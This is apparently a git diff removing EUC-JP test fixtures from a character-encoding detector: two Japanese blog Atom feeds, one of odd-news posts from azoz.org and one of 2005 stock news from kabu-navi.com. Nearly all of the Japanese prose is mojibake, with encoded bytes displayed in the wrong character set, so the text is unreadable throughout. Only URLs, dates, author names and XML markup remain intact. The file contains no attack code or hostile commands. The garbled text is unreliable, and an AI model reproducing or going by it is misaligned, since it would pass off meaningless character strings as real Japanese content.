    - -¸µ¥י¥°¥׃¡¼ֱ×¼ך¡¢£²³¬₪־ֱכ₪«₪י¡ײ¥ׁ¥¹₪µ₪ל₪¿¡׳ְײ₪ֱ₪ד₪ף₪ע¥­¥ד¥ֳ¥ֱ -http://azoz.org/archives/200512121508.php -05121201.jpg¡־±ׁ¹ס¡ֿ¡¡¸µ¥י¥°¥׃¡¼ֱ×¼ך¡¢¥¥₪¥¯¡¦¥¦¥§¥ֳ¥׀¡¼»ב¡38÷׀¡ֻ₪־־²ָ₪ַ²׀»צ₪¬ָ¯ְ¸¡¢ֶ¨₪²ֳ₪ל₪¿½»¿ֽ₪¬£²³¬₪־ֱכ₪«₪י¡ײ¥ׁ¥¹¡׳₪·₪¿ְײ₪ֱ₪ד₪ף¡9¥צ·מ¡ֻ₪ע¥¦¥§¥ֳ¥׀¡¼»ב₪¬¸«»צ¼ץ₪±¼ט₪ך¡¢ֲחְ₪»ׂ¶¡₪־ּ¿₪עµ₪ֳ₪¿¡£

    - -

    ¡ײּ¿₪־¥ׁ¥¹¡׳₪ע¼ץ₪±¼ט₪ֳ₪¿¥¦¥§¥ֳ¥׀¡¼»ב₪ֿ₪½₪־¸ו¡¢¸¼´״₪ע²ץ₪·₪ֶ²׀÷ֵׂ׃ֳז₪־²ָ₪ָֻפ₪׃¹‏₪¡¢ֳז₪ֻ₪₪₪¿ֱ´°ק₪עµ½׀¡¢₪µ₪י₪ֻ²׀₪ע¾ֳ₪·»₪ב₪כ₪³₪ָ₪ֻ₪גְ®¸ש₪·₪¿¡£¡½¡½₪½₪־ִ«¡¢¥¦¥§¥ֳ¥׀¡¼»ב₪¬¿·¹₪ע¼ט₪ך₪ֻ¼«ֲנ₪־³°₪״½׀₪¿₪ָ₪³₪ם¡¢₪ֹ₪³₪«₪י₪«ָבִּ₪¬¹₪³₪¨₪ֶ₪­₪¿₪ָ₪₪₪¦¡£

    ]]>
    -SPIFFY -eizo -2005-12-12T15:08:52+09:00 -
    - -¡ײֲ­₪עח׃₪ב₪ם¡׳₪ָ¥¦¥¨¡¼¥ָ¥ל¥¹₪ֻּ¿־ב₪µ₪ל₪¿ֳֻ¡¢³ת₪ֹױ₪₪₪ֶָ³¶ג·÷ -http://azoz.org/archives/200512091759.php -05120901.jpg¡־¥¥כ¥ך¥ף¡ֿ¡¡¥ֹ¥₪¥ִ₪־÷ָ½½ך₪ֿ¿וֶֻֽ¡¢¥¦¥¨¡¼¥ָ¥ל¥¹₪־ֲ­₪ֻ³ת₪ֹױ₪₪₪¿ְֳֻ­₪ָֻ³¶ג·÷₪עְכ¹נ₪·₪¿¡£₪³₪־ְֳֻ­₪¬¥׃¡¼¥כ₪ע¥¦¥¨¡¼¥ָ¥ל¥¹₪־ֲ­₪ֻ₪³₪₪·₪ֶ₪·₪₪ֳ₪¿₪ָ₪³₪ם¡¢ָא½ק₪ֻ¡ײח׃₪ב₪ֶ₪­₪ל₪₪₪ֻ₪·₪ֶ₪ט¡׳₪ָּ¿־ב₪µ₪ל₪¿₪ָ₪₪₪¦¡£

    - -

    ₪·₪«₪·¡¢ֳֻ₪ֿח׃₪ב₪÷₪ָֻא½ק¡¥¦¥¨¡¼¥ָ¥ל¥¹¡ֻ₪־ֲ­₪ֻ³ת₪ֹױ₪₪₪¿¡£ֶ±¹סְ¾ֹפ¡¢¥²¥כ¥¼¥ף¥­¥כ¥״¥ף₪־ֳֿ‎÷ָ½½ך₪ְֿ¼ְּ₪ַ¡¢¡ײָא½ק₪ֿ³ת₪₪ל₪ֶ¥±¥¬₪¹₪כ₪¿₪ב₪ֻ₪ַ₪ֿ₪₪¯¡¢"ֱ½"₪·₪ֶ₪ג₪י₪¦₪¿₪ב¡¢ֳֻ₪ֲֻ­₪ע÷¹₪·½׀₪·₪¿₪־₪ַ₪¢₪כ¡׳₪ָ₪·₪ֶ₪₪₪כ¡£

    ]]>
    -DUMBASS -eizo -2005-12-09T17:59:07+09:00 -
    - -¡ײ־₪־¥«¥¦¥ף¥¿¡¼₪ַ₪×´ך₪₪₪·₪₪¹¡׳¡¢₪½₪¦¸ְ₪ן₪ל₪ֶ¼ך₪ײ₪י₪ֶַ¨ֱצ₪·₪¿¶ה¹װ¶¯ֵנ -http://azoz.org/archives/200512081153.php -05120801.jpg¡־¥×¡¼¥¹¥ָ¥ך¥¢¡ֿ¡¡¶¯ֵנ₪¬¶ה¹װ₪־¼ץֹױֱכ¸‎₪ַ₪×¶ג₪עֽ׳µב₪·₪¿₪ָ₪³₪ם¡¢¿¦°ק₪ֻ¡ײ₪ָ₪₪ך₪־ֱכ¸‎₪ַ₪×´ך₪₪₪·₪₪¹¡׳₪ָ¸ְ₪ן₪ל₪ֶ₪·₪₪₪¡¢·כ¶ֹ¼ך₪ײ₪י₪ֶַ¨ֱצ₪¹₪כ₪ָ₪₪₪¦»צ·ן₪¬ָ¯ְ¸₪·₪¿¡£

    - -

    ָָ¿ֽ₪־ֳֻ₪ֿ¶ה¿§₪־¾®ָ¢₪ע¼ך₪ֻ»‎₪ֳ₪ֶ¶ה¹װ₪״₪ה₪ֳ₪ֶ₪­₪¿¡£¡ײֳז₪ַֻתֳֶ₪¬ֶ‏₪ֳ₪ֶ₪₪₪כ¡׳₪ָ¼ץֹױ₪־¶ה¹װ¿¦°ק₪ע¶¼₪·₪ֶ¶ג₪עֳ¥₪×₪¦₪ָ₪·₪¿₪ָ₪³₪ם¡¢¡ײ₪½₪־₪ט₪¦₪¼ךֲ³₪­₪ֿ₪³₪ֱ₪י₪־ֱכ¸‎₪ַ₪ֿ₪ַ₪­₪₪»₪ף¡׳₪ֲָ׀±‏₪·₪¿¿¦°ק₪ֻ°ל½³₪µ₪ל₪¿¾ו¡¢²£₪־ֱכ¸‎₪״¹װ₪¯₪ט₪¦₪ֻ»״¼¨₪µ₪ל₪¿¡£

    ]]>
    -DUMBASS -eizo -2005-12-08T11:53:43+09:00 -
    - -³״ְ¸¡¢¥ָ¥₪¥ל₪ֻֽמ₪ָ₪·₪¿·ֲָ׃₪ע¼ט₪ם₪¦₪ָ₪·₪¿₪¬¼ך₪¬ָ´₪±₪₪¯₪₪כ -http://azoz.org/archives/200512071032.php -05120701.jpg¡־¥­¥¨¥ױ¡¦¥¦¥¯¥י¥₪¥¡ֿ¡¡₪¢₪כ³״ְ¸₪¬¥ָ¥₪¥ל₪ֻ·ֲָ׃ֳֵֵֿ₪עֽמ₪ָ₪·₪ֶ₪·₪₪₪¡¢¼ך₪עֶֽ₪ֳ¹‏₪ף₪ַ¼ט₪ם₪¦₪ָ₪·₪¿₪ָ₪³₪םֿ׃₪¬ָ´₪±₪₪¯₪₪ך¡¢₪·₪׀₪י₪¯₪¿₪ֳ₪ֶ₪«₪י¥ל¥¹¥­¥ו¡¼ֲג₪ֻµ½ץ₪µ₪ל₪כ₪ָ₪₪₪¦»צ·ן₪¬¥¦¥¯¥י¥₪¥₪ַָ¯ְ¸₪·₪¿¡£

    - -

    ֳֿ¸µ·»¡₪¬ָ¯ֹ½₪·₪¿₪ָ₪³₪ם₪ֻ₪ט₪כ₪ָ¡¢₪³₪־ְֳֻ­₪ֿ¥¦¥¯¥י¥₪¥¡¦¥×¥ַ¥ֳ¥µ½£₪־־הֵא¹©¶ָ¥¢¥«¥ַ¥¡¼₪ֻ½ךֲ°₪¹₪כ¥ל¥׀¥־¥ף¹סְׂ₪־³״ְ¸₪ְ₪ָ₪₪₪¦¡£

    ]]>
    -FUN -eizo -2005-12-07T10:32:03+09:00 -
    - -iPod₪עּף600±₪ַַד₪×₪¦₪ָ₪·₪¿ֲח³״ְ¸¡¢µד₪­₪־¸¶ח₪ַµ¯ֱ₪עָּ₪ל₪כ₪«¡© -http://azoz.org/archives/200512031633.php -05120301.jpg¡־ֶ¥³¥ם¥י¥ֹ½£¡¦¥¡¼¥כ¥ְ¡¼¡ֿ¡¡¼ֲ÷₪ּֿף18,000±₪ַַה₪י₪ל₪ֶ₪₪₪כ¥¢¥₪¥¥ֳ¥ֹ₪ע¡¢¥׀¡¼¥³¡¼¥ֹ₪עֵ½₪ך₪«₪¨₪כ₪³₪ָ₪ֻ₪ט₪ֳ₪ֶ₪ן₪÷₪«600±₪ַ¹״ֶ‏₪·₪ט₪¦₪ָ₪·₪¿ֳֻ»ֲׂח³״ְ¸₪¬ֲבב₪µ₪ל₪¿¡£µ¶₪־¥׀¡¼¥³¡¼¥ְֹ©÷מ₪ֻ»ָֽׁ₪·₪¿₪־₪ֿ¡¢¥¦¥§¥ײ¥µ¥₪¥ָ¡http://www.barcodemagic.com/¡ֻ₪ַ¥ְ¥¦¥ף¥ם¡¼¥ֹ₪·₪¿¥½¥ױ¥ָ₪ְ₪ָ₪₪₪¦¡£

    - -

    ֲבב₪µ₪ל₪¿₪־₪ֿ¡¢¥³¥ם¥י¥ֹ½£־©ֲח³״₪־£±ַ¯ְ¸¡¢¥¸¥ח¥¥µ¥ף¡¦¥׀¥כ¥ַ¥£¥־¡19÷׀¡ֻ₪ַ¡¢·÷»צֱ¾₪µ₪ל₪כ²ִַ½ְ­₪ג₪¢₪כ₪ָ₪₪₪¦¡£¥ַ¥ף¥׀¡¼¥¥¹¥ָ»ז₪ֻ₪ט₪כ₪ָ¡¢¥׀¥כ¥ַ¥£¥־₪ֿµ¯ֱ₪µ₪ל₪₪₪₪ט₪¦₪ֻ¡¢·»¡ֵצ¶ֹ₪ֻ¡ײµד₪­₪־¸¶ח¡¸½ס¡ֻ¡׳₪עִף½׀₪·₪¿₪ָ₪־₪³₪ָ¡£ֶגֶֽ₪ֿ°²¼₪־₪ָ₪×₪ך¡£
    -

    ]]>
    -FUN -eizo -2005-12-03T16:33:02+09:00 -
    - -£¹÷׀₪־¾¯ַ¯¡¢ ¡ײֻֽ₪־ִן₪ְ₪«₪י¡׳₪ָ£´÷׀₪־ִן₪ע₪«₪׀₪ֳ₪ֶ·ג₪¿₪ל₪כ -http://azoz.org/archives/200511302045.php -05113001.jpg¡־ֶ¥³¥ם¥י¥ֹ½£¡¦¥ַ¥ף¥׀¡¼¡ֿ¡¡¼«¬₪־ִן₪ע¼י₪ם₪¦₪ָ₪·₪ֶַ״ֳז₪ע·ג₪¿₪ל₪¿£¹÷׀₪־¾¯ַ¯₪ֻ¡¢₪½₪־ֽ¦µ₪₪ע¾־₪¨₪ֶ·»¡ֵצ¶ֹ¡¢₪×₪ט₪׃³״¹»₪«₪י¥ָ¥ם¥ױ¥£¡¼₪¬ֲ£₪י₪ל₪¿¡£

    - -

    ₪ּּ₪ע₪·₪¿ֶף¿ֱָֽ₪־¶¯ֵנ₪¬£±£°·מ£²£¶ֶ¡¢¥ך¥«¡¼¥ֹ¡¦¥«¥כ¥ַ¥י·¯¡£¹÷׀¡ֻ₪־²ָ₪ֻ¿¯ֶ‏₪·₪¿¡£ֵצ»‏¡¢²ָ₪ֻ₪ֿ¥ך¥«¡¼¥ֹ·¯₪ָָא₪־ִן₪ַ₪¢₪כ¥¨¥¹¥ֶ¥׀¥ף·¯¡£´÷׀¡ֻ¡¢₪µ₪י₪ָֻא₪י·»ִן₪־ל¿ֶ₪¬₪₪₪¿₪ָ₪₪₪¦¡£¶¯ֵנ₪ֿ½ֶ₪עָ¯ֻ₪₪·₪¿₪¬¡¢¥ך¥«¡¼¥ֹ·¯₪ֿׂפ׃ֽ₪ִֻן₪־¿ָ₪ע₪«₪׀₪₪¡¢¼«₪יַ״ֳז₪ֻ½ֳֶֶ₪ע¼ץ₪±₪ִֶן₪־ּ¿₪עµ₪ֳ₪¿¡£

    ]]>
    -SPIFFY -eizo -2005-11-30T20:45:28+09:00 -
    - -ַ¯¶גְ¸³ט₪־½קְ­¡¢¼«¬ֽׁ₪ֻ£³¸ִּ₪־´½²³₪ע¹״ֶ‏ -http://azoz.org/archives/200511291930.php -05112901.jpg£±£°ַ¯ֱ°₪ֻ÷ַ½י₪־¡ײ¼«¬ֽׁ₪־´½²³¡׳₪ע¹״ֶ‏₪·₪¿₪ָ₪µ₪ל₪כ¥כ¡¼¥¥ֻ¥¢¿ֽ½קְ­₪¬¡¢÷ַ¶ב£³¸ִּ₪־´½²³₪עַד₪ֳ₪¿₪ָף₪¸₪י₪ל¡¢ֲֳֿך₪ָ₪₪ֳ₪ֶ₪₪₪כ¡£

    - -

    ¥כ¡¼¥¥ֻ¥¢ְ¾ֹפ¡¦¥¥µ¥ָ¥ֻ÷½»₪־¥¥ך¥¢¥₪µ₪ף¡£·£²÷׀¡ֻ₪ֿ¸½÷ַ¯¶גְ¸³ט₪עֱק₪ֳ₪ֶ₪₪₪כ₪¬¡¢¼«¬ֽׁ₪־´½²³₪ע÷£₪₪ַ₪ֻ£²¸ִַד₪ֳ₪¿₪³₪ָ₪¬₪¢₪כ₪ָ₪₪₪¦¡£₪·₪«₪·¡¢₪½₪ל₪י₪¬ֱ´₪ֶ¡ײ»ָ₪₪ס׳₪ֻ₪₪י₪₪¯₪₪ֳ₪ֶ₪·₪₪ֳ₪¿₪¿₪ב₪ֻ÷£²ף₪₪¿¿·₪·₪₪´½²³₪ע¹״ֶ‏₪·₪¿₪ֳָֿ₪¹¡£

    ]]>
    -SAD -eizo -2005-11-29T19:30:14+09:00 -
    - -¡ײ¥¡¼¥₪¥ױ¥ל¥ף¥ֹ₪־¥­¥¹¡׳₪¬»א°ר¡©£±£µ÷׀¾¯½קֻ´₪¯₪₪כ -http://azoz.org/archives/200511260855.php -05112601.jpg¥«¥¥ְ¡¦¥±¥¥ֳ¥¯½£¥µ¥²¥¥₪÷½»₪־£±£µ÷׀₪־¾¯½ק₪¬ְט½µֶֶֻֽ₪ֻֻ´₪¯₪₪ֳ₪¿₪¬¡¢₪½₪־»א°ר₪ָֿא»ב₪ֻ¥­¥¹₪µ₪ל₪¿₪«₪י₪ַ₪ֿ₪₪₪₪«₪ָ₪₪י₪ל₪ֶ₪₪₪כ¡£¾¯½ק₪ֿ¥װ¡¼¥¥ֳ¥ִ₪ֲֻ׀₪¹₪כ¥¢¥ל¥כ¥®¡¼₪¬₪¢₪ֳ₪¿¡£

    - -

    ÷£¸וֲֹֽ‎²עֻ¶₪¬¹װ₪ן₪ל₪כֽ½ִך₪ָ₪₪ֳ₪ֶ₪₪₪כ₪¿₪ב¡¢¸½÷₪־₪ָ₪³₪ם¥¢¥ל¥כ¥®¡¼₪¬ִ¾ְ₪־¸¶°ר₪ָ₪ֳִַֿך₪µ₪ל₪ֶ₪₪₪₪₪¡£₪·₪«₪·¡¢ֵצ¶ֹ₪ֿ¥װ¡¼¥¥ֳ¥ִ¥׀¥¿¡¼₪ע¿©₪₪¿¥¡¼¥₪¥ױ¥ל¥ף¥ֹ₪¬¡¢ָא½ק₪ֻ¥­¥¹₪·₪¿₪³₪ָ₪¬¸¶°ר₪ַ₪¢₪כ₪ָ₪־¸«²ע₪ע¼¨₪·₪ֶ₪₪₪כ¡£

    ]]>
    -SAD -eizo -2005-11-26T08:55:41+09:00 -
    - -µ₪ֻ¥­¥¹₪·₪₪«₪ֳ₪¿ִּ¹װ¿ֽ₪עµ₪ַ²¥₪ֳ₪¿ֳֻ ¡½ ָן³²¼װ₪־ֻֻ₪ֻµ₪־־ -http://azoz.org/archives/200511241525.php -05112401.jpgֹװ¿³₪ֳֻ₪ֱֶֻֽ³ִּ¹װ¿ֽ₪¬µ₪ַ²¥₪י₪ל₪כ»צ·ן₪¬¥¹¥³¥ֳ¥ָ¥י¥ף¥ֹ₪ַָ¯ְ¸₪·₪¿¡£ָָ¿ֽ₪־ֳֻ₪ִֿ¾₪°₪ֻ¸½¾לֹױ¶ב₪ֲַבב₪µ₪ל₪¿₪¬¡¢¸¡»¡ֲ¦₪ֿ₪₪÷´ײ°ד₪₪₪₪¯¶״¸ַ·÷₪ֻ½ט₪µ₪ל₪כ₪³₪ָ₪ֻ₪₪כ₪ְ₪ם₪¦¡¢₪ָ₪·₪ֶ₪₪₪כ¡£

    - -

    ָָ¹װ₪עַ§₪ב₪¿₪־₪ֿ¥°¥ל¥ף¥¸¥¥¦¥¹÷½»₪־¥ַ¥׃¥ֳ¥ֹ¡¦¥¨¥׀¥ף¥÷¡£²£²÷׀¡ֻ¡£»צ·ןָ¯ְ¸₪ֿ÷£ַ¯£µ·מ₪־¸ב¸ו£¸»‏ָ¾÷¢₪־₪³₪ָ₪ְ₪ֳ₪¿₪ָ₪₪₪¦¡£₪½₪־ֶ¡¢¥¢¥י¥ף¡¦¥¥ֻ¡¼»ב¡£²£°÷׀¡ֻ₪¬¸ר±א₪עִּ₪ךָ´₪±₪ט₪¦₪ָ₪·₪ֶ₪₪₪¿₪ָ₪³₪ם¡¢µ₪ע»‎₪ֳ₪¿ֳֻ¡¥¨¥׀¥ף¥÷¡ֻ₪¬¶ב₪ֵ₪₪₪ֶ₪­₪ֶ¡¢¥¥ֻ¡¼»ב₪ֻ₪³₪¦₪¿₪÷₪ֽ₪¿¡£

    ]]>
    -DUMBASS -eizo -2005-11-24T15:25:17+09:00 -
    - - -
    \ No newline at end of file diff --git a/chardet/tests/EUC-JP/blog.kabu-navi.com.atom.xml b/chardet/tests/EUC-JP/blog.kabu-navi.com.atom.xml deleted file mode 100644 index 0feb342..0000000 --- a/chardet/tests/EUC-JP/blog.kabu-navi.com.atom.xml +++ /dev/null @@ -1,541 +0,0 @@ - - - -¡ײֹי₪±₪₪₪¡׳ֵך»ס²ָ₪־ֶµ­ - -2005-03-30T16:11:01Z -µ₪₪₪₪ֻ¡¢ֱֵּ³₪ִֻײ₪ך₪₪¹¡£ֶֹ₪ף₪ַ₪¯₪ל₪¿₪י¡¢₪¢₪ך₪¬₪ָ₪¦¡£ -tag:www.kabu-navi.com,2005:/mt//1 -Movable Type -Copyright (c) 2005, kabunavi - -³פ¼°ֱֳּ¡¥¨¥ױ¥§¥¯¥¿¡¼÷ֻ¦¸¦µז½ך¡¢½יֳֽ₪ֿ¸ר³«²ֱ³₪ע37¡ף²¼²ף₪כ¡¦£ֹ£׀£ֱֳּֿ₪ָ₪·₪ֶ₪ֿ°־ד₪־ֵ¸³« - -2005-03-30T16:11:01Z -2005-03-30T16:08:09Z -tag:www.kabu-navi.com,2005:/mt//1.179 -2005-03-30T16:08:09Z -IPO¿ְֳַֻֿ₪ל₪¿₪ך¡£ ₪₪¢¡¢־ד³°₪₪ף₪ַ₪·₪ח₪¦₪±₪ֹ¡£ ₪¢₪₪ך¡¢IPO₪ֿ»ה₪ֻ₪ֿ¸‏₪«₪... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥ֻ¥ו¡¼¥¹ - -IPO¿ְֳַֻֿ₪ל₪¿₪ך¡£

    - -

    ₪₪¢¡¢־ד³°₪₪ף₪ַ₪·₪ח₪¦₪±₪ֹ¡£

    - -


    -₪¢₪₪ך¡¢IPO₪ֿ»ה₪ֻ₪ֿ¸‏₪«₪₪₪₪־₪ַ¡¢¿ְֳֿ₪¬ַֻ₪ל₪ֶ₪¯₪ל₪ֶ
    -₪ָ₪ֶ₪ג₪¢₪ך₪¬₪¿₪₪¡£
    -¡₪¯₪ה₪·₪₪₪«₪י¡ֻ

    - -

    ½׀ֵµ
    -¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ

    - -

    ¡¡3/30 12:13¡ֱֻ°ֶ¡¢ּ¾¾¥»¥ף¥ָ¥ל¥ֳ¥¯¥¹₪ֻ¾ו¾ל₪·₪¿¥¨¥ױ¥§¥¯¥¿¡¼÷ֻ¦¸¦µז½ך (4567) ₪¬38ֻ±₪־¸ר³«²ֱ³₪עּף37¡ף²¼²ף₪כ24ֻ±₪־½יֳֽ₪ַ¾ו¾ל£²ֶּ₪ֻ₪·₪ֶ´ף₪ךֹױ₪₪₪¿¡£

    - -

    ֶ±¼ׂ₪ֵֿלµ‏ֲח³״ָ¯₪־¥׀¥₪¥×¥¥ף¥ֱ¥ד¡¼₪ַ¡¢₪¬₪ף¼£־ֵ₪״₪־±‏ֽׁ₪ה¹³¥¢¥ל¥כ¥®¡¼÷₪־³«ָ¯₪ע¼ך³₪±₪כ¡£¼ח´´»צ₪ֿ¥ֻ¥ֳ¥¥ףֱק (4660) ₪־ַד¼‎₪ַ°לּצְ₪´ײ₪־´״¿´₪ע½¸₪ב₪¿¥י¥₪¥ײ¥ֹ¥¢ (4753) ₪־»ׂ²ס¼ׂ₪ָ₪₪כ¥י¥₪¥ײ¥ֹ¥¢¾·פ¡£

    - -

    ₪³₪־½יֳֽ₪ַ₪ג»‏²ֱֱם³₪ּֿף235²¯₪ֻ₪גµ₪׃¡¢¼ׂ°ק¿פ30ּ¾¶¯₪ַ2003ַ¯£µ·מ´₪₪ַ₪ַֿה¾ו¹ג₪ג 2000ֻ±ֲז¡2004ַ¯£µ·מ´₪ֻ¶¦ֶ±³«ָ¯¼ֲ»¸¢¡¦ְֶָךָ־ַה¸¢₪־°לֹפ₪ע£´²¯500ֻ±₪ַַהµׁ₪¹₪כ₪³₪ָ₪ֻ₪ט₪ֳ₪ֶ¾ו¾לִ¾ֱ°₪־ַה¾ו¹ג₪ֻ´״₪·₪ֶ₪ֿ£´²¯7800ֻ±₪ע³־₪·₪¿¡ֻ₪·₪«₪₪₪´כ¶ָ₪₪־₪ֻ₪ג´״₪ן₪י₪÷»‏²ֱֱם³₪ַ₪ֿ₪ן₪«₪ג₪ְָ½ּפ₪הֶֻ¥±¥¥ױ¥¡₪₪ֹ₪־ֳז·ר₪־°וּפֹ´״ֿ¢³פ₪ע¾ו²ף₪כ³₪ֻ₪₪ך¡¢»װ¾ל´״·¸¼װ₪«₪י₪ֿ¸ר³«²ֱ³ְִך₪־ֳ³¬₪«₪י´כ¶ָ²ֱֳֽ₪ע²בֲחֹ¾²ֱ₪·²ב₪®₪¿₪־₪ַ₪ֿ₪₪₪₪«₪ָ₪₪₪ֳ₪¿»״ֵ¦₪ג¹₪«₪ל₪¿¡£

    - -

    ֲ³₪­₪ֿ₪³₪ֱ₪י₪«₪י

    - -

    ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ

    ]]> - -
    -
    - -ֵ´¹£³¼ׂ¡¢³פ¼°₪־»‎₪ֱ¹ח₪₪¶¯²½¸¡ֶ₪¡¡ֵ¨ֲ׀ֵ×ַד¼‎₪ֲֻ׀±‏ - -2005-03-30T16:05:29Z -2005-03-30T16:01:37Z -tag:www.kabu-navi.com,2005:/mt//1.178 -2005-03-30T16:01:37Z -ְֳֶּםּ₪·₪ֶ₪₪ֶ₪×₪¯ֱֳּ₪ָ₪·₪ֶ¡¢ ¿·ְֶֻ½ֵ´¡¢½»ֽ§¶גֲ°¹©¶ָ¡¢¿ְ¸ְֽ½¹½ך₪גִֹ²ֳ₪ַ₪¹... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥ֻ¥ו¡¼¥¹ - -ְֳֶּםּ₪·₪ֶ₪₪ֶ₪×₪¯ֱֳּ₪ָ₪·₪ֶ¡¢
    -¿·ְֶֻ½ֵ´¡¢½»ֽ§¶גֲ°¹©¶ָ¡¢¿ְ¸ְֽ½¹½ך₪גִֹ²ֳ₪ַ₪¹¡£

    - -

    ֶ°₪­₪¬₪ט₪±₪ל₪׀¡¢¥ַ¥₪¥ָ¥ל₪¹₪כ₪«₪ג₪·₪ל₪₪»₪ף¡£

    - -

    ֳזִ¹´₪ַ»‎₪ִ₪«₪ֿ¡¢ֲ¨·ט₪ַ₪­₪₪»₪ף¡£
    -₪ג₪¦₪ֱ₪ח₪₪ִ´₪₪₪₪₪ָ¡£

    - -

    ₪₪¼¡¢¶½ּ£₪ע₪ג₪ֳ₪¿₪«₪ָ₪₪₪¦₪ָ¡¢₪³₪־»‏ֲו₪ֻµױ¹װ₪¹₪כ¥ֻ¥ו¡¼¥¹₪«₪י¡£

    - -

    »‏ֲו₪ֻµױ¹װ₪¹₪כ₪«₪י¡¢ִ¹₪₪ּ₪ַ₪₪ל₪׀¥¥₪¥¥¹÷א־ֱ₪ְ₪ם₪¦₪¡¦¡¦¡¦

    - -

    ½׀ֵµ₪ֿ₪³₪³
    -¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ¡ֱ

    - -


    -¿·ְֶֻ½ֵ´¡¢½»ֽ§¶גֲ°¹©¶ָ¡¢¿ְ¸ְֽ½¹½ך₪ֿ£³£°ֶ¡¢¹÷א¶¡µכ₪־»צ¶ִָף·ָ₪ע³ָ½¼₪¹₪כ₪ָ₪ָ₪ג₪ֻ¡¢ֵ¨ֲ׀ֵ×ַד¼‎₪₪ֹ₪ֻ¶¦ֶ±₪·₪ֲֶ׀±‏₪¹₪כ₪¿₪ב¡¢£³¼ׂ₪¬³פ¼°»‎₪ֱ¹ח₪₪₪־¶¯²½₪ע¸¡ֶ₪₪¹₪כ₪ָָ¯ֹ½₪·₪¿¡£¹ס÷ֵ×₪¶¥ֱט־ֿ₪־¸‏¾ו₪גְֱ₪₪¡£

    - -

    ¡¡ֵ´¹£³¼ׂ₪־ֿ¢·ָ¶¯²½₪ֿ¡¢¥י¥₪¥ײ¥ֹ¥¢₪ֻ₪ט₪כ¥ֻ¥ֳ¥¥ףֱק₪״₪־ֵ¨ֲ׀ַד¼‎₪־ֶ°₪­₪₪ֹ₪עַ״·₪ֻ¡¢´םµ¡´¶₪¬ֶֻ₪־´נ´´»÷¶ָ₪ֻ₪₪ַַָµ₪·₪¿₪³₪ָ₪ע¼¨₪·¡¢ֲ¾»÷¶ָ₪־ַד¼‎ֹֻ±ׂ÷צ₪ֻ₪ג±ֶ¶ֱ₪עֽ¿₪¨₪½₪¦₪ְ¡£

    - -

    ¡¡ִף·ָ¶¯²½₪ֿ¿·ֵֶ´₪־»°ֲ¼ְֹּ׳¼ִׂ¹¡¢½»¶ג₪־²¼÷ַמ¼ִׂ¹¡¢¿ְ¸ְֽ½¹₪־¸₪ֹתֲֹ׳¼ִׂ¹₪¬₪³₪־ֶ¡¢ֵװֶג₪ַ¶¦ֶ±µ­¼װ²ס¸«₪·ֹ½ְּ₪·₪¿¡£

    - -

    ¡¡£³¼ׂ₪ֿ¸½÷¡¢₪½₪ל₪¾₪לָ¯¹װ÷ׁ₪³פ¼°₪־£°¡¦£³£°¡£²¡¦£µ£µ¡ףִרֵ¡£²£°£°£´ַ¯£¹·מֻצ»‏ְֵ¡ֻ₪עֽ­¡£÷£¸ו¡¢ִֹ²ֳ₪ַ¼טְֶ₪¹₪כµ¬ּֿ₪ה»‏´₪ֻ₪ִ₪₪₪ֶ₪ּֿ₪ִך₪ְ₪¬¡¢ֵ¨ֲ׀ֵ×ַד¼‎₪₪ֹ»סֻ»װ¾ל₪־ׁ²½₪ֻ₪ֹ₪־₪ט₪¦₪ֲ׀±‏÷צ₪¬₪¢₪כ₪«₪ע´₪ב¶¦ֶ±₪ַ¸¡ֶ₪₪¹₪כ‎¿ֻ₪ְ¡£

    - -

    ¡¡¿·ֵֶ´₪־»°ֲ¼¼ִׂ¹₪ֿ¡¢»‎₪ֱ¹ח₪₪¶¯²½¸¡ֶ₪₪־ְֱ₪₪₪ֻ₪ִ₪₪₪ֶ¡ײַד¼‎ֹֻ»÷צ₪ַ₪ֿ₪₪¯¥¢¥י¥₪¥¢¥ף¥¹¡ִף·ָ¡ֻ₪־¶¯²½₪־₪¿₪ב¡׳₪ָ₪·₪₪¬₪י₪ג¡ײ³פ²ֱ₪ֻµ»½ׁ־ֿ₪־ֽ¥₪ל₪¿ְֵ₪¬ָ¿±ַ₪µ₪ל₪ֶ₪₪₪₪₪¡£¾ן₪ֻ₪½₪¦₪₪₪¦¡ֵ¨ֲ׀ֵ×ַד¼‎₪־ֹ¸ֵ×₪ֻ₪₪כ¡ֻ²ִַ½ְ­₪ֿ₪¢₪כ¡£ְר÷ֵ×₪¶¼°ׂ₪ָֻק₪¨₪¿₪₪¡׳₪ָ½ׂ₪₪¿¡£

    - -

    ¡¡₪₪¿¡¢½»¶ג₪־²¼÷¼ִׂ¹₪ֿ¡ײ»סֻ»װ¾ל₪¬¿׳ֲ®₪ֶֻ°₪₪₪ֶ₪₪₪כֳז₪ַ¡´כ¶ָ₪¬¡ֻּµָֹֻק₪ָ₪־ָדָ½₪¬₪¢₪כ¡£ּµָֹֻק₪ָ¸ְ₪ן₪ל₪₪₪₪ט₪¦¶¯₪·₪ט₪¦₪ָ₪₪₪¦₪³₪ָ¡׳₪ְָגְּ₪·₪¿¡£

    - -

    ¡¡¹÷א₪־¶¡µכּּ₪ַ₪ֿ¡¢¿·ֵֶ´₪ָ¿ְ¸ְֽ½¹₪¬½»¶ג₪־»ׂ²ס¼ׂ₪ֻ½׀»ס₪·¡¢ָ¾ְ½ֹ₪־¹÷אֽ¾¾ך¬₪ע¿·ֵֶ´₪₪ֹ₪ֻ¶¡µכ₪¹₪כ₪₪ִֹף·ָ₪ע³ָ½¼₪¹₪כ¡£

    - -

